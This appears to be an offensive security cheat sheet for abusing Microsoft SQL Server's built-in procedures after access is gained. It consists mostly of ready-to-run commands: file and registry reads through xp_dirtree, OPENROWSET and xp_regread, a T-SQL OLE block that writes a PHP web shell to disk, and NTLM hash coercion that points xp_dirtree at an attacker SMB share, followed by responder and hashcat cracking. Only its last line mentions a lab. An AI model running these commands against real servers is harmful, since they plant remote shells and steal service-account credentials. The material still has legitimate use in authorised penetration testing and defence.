MSSQL can access files, registry keys, Windows identity mappings, and UNC paths through built-in procedures and providers.
These primitives matter even without direct command execution.
File And Directory Discovery
List directories:
EXEC xp_dirtree 'C:\', 1, 1;
Check file existence:
EXEC xp_fileexist 'C:\Windows\System32\drivers\etc\hosts';
Subdirectories:
EXEC xp_subdirs 'C:\Windows';
File Read With OPENROWSET
Check Ad Hoc Distributed Queries:
SELECT name, value_in_use
FROM sys.configurations
WHERE name='Ad Hoc Distributed Queries';
Enable when permitted:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;
Read a local file:
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x;
Hosts file:
SELECT * FROM OPENROWSET(BULK N'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS Contents;
Remote query pivot:
SELECT name
FROM OPENROWSET('MSOLEDBSQL','Server=10.10.10.37;Trusted_Connection=Yes;','SELECT name FROM master.sys.databases');
Linked query:
SELECT * FROM OPENQUERY([LINKNAME], 'SELECT DB_NAME() AS db, @@SERVERNAME AS srv');
File Write With OLE
Enable OLE Automation:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;
Create a file:
DECLARE @OLE INT;
DECLARE @FileID INT;
EXEC sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;
EXEC sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'C:\path\to\your\webshell.php', 8, 1;
EXEC sp_OAMethod @FileID, 'WriteLine', NULL, '<?php echo shell_exec($_GET["c"]);?>';
EXEC sp_OADestroy @FileID;
EXEC sp_OADestroy @OLE;
Registry Access
Use for host fingerprinting, secrets, credentials, and environment discovery through xp_reg*.
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName','ComputerName';
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\\CurrentControlSet\\Control\\Lsa','Security Packages';
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion','ProductName';
EXEC master..xp_regenumkeys 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProfileList';
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest','UseLogonCredential';
Windows Mapping
Discover Windows group mappings and login information:
EXEC xp_logininfo 'BUILTIN\\Administrators', 'members';
EXEC xp_logininfo;
UNC Path NTLM Coercion
These procedures can touch UNC paths:
xp_fileexist
xp_dirtree
xp_subdirs
Start a capture listener:
sudo responder -I tun0 -v
or:
sudo impacket-smbserver share ./ -smb2support
Coerce authentication:
EXEC master..xp_dirtree '\\ATTACKER\\share\\ping';
EXEC master..xp_subdirs '\\ATTACKER\\share\\ping';
EXEC master..xp_fileexist '\\ATTACKER\\share\\ping';
IP form:
EXEC xp_dirtree '\\10.10.110.17\share\';
EXEC xp_subdirs '\\10.10.110.17\share\';
EXEC xp_fileexist '\\10.10.110.17\share\';
If successful, the MSSQL Server service account authenticates to the rogue SMB server and exposes a NetNTLMv2 challenge-response.
Crack with hashcat mode 5600:
hashcat -m 5600 hashes.txt rockyou.txt
Use this to evaluate whether the SQL service account is a domain user and whether that identity can be relayed or cracked in the lab.